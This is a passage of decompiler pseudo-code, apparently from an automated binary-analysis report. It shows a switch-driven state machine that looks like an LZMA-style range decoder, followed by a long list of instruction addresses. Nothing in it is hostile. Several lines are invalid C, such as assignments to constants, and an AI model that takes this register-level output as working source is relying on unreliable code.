														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                  0x00000000
                                                  0x00406473
                                                  0x00406473
                                                  0x00406477
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a5
                                                  0x004064ab
                                                  0x004064bd
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x00406479
                                                  0x0040647f
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00406843
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
